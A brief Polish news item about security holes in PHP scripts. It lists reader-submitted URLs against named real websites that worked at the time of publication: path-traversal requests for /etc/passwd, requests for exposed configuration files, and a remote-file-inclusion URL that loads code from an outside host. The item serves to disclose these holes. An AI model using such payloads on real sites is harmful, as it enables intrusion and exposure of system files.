Dziury w skryptach PHP

Wielu z naszych czytelników, po opublikowaniu artykułu „Izba marnie zabezpieczona” – podesłało nam kilkanaście linków dających dość oryginalne wyniki, wśród nich m.in.:

http://imiennik.com.pl/index.php?plik=../../../etc/passwd
http://www.tester.com3.pl/index.php?plik=../../../../../etc/passwd
http://www.wirtualnypoznan.pl/inc
http://www.krakow.pl/.htaccess_o
http://www.krakow.pl/samorzad/fotoreportaz/?id=http://republika.pl/h0meless/a/test

W chwili publikowania powyższych adresów wszystkie z nich pokazywały faktycznie te informacje na które wskazywał ich URL.

Zobacz również:

passwd Portalu Księgarskiego

Izba marnie zabezpieczona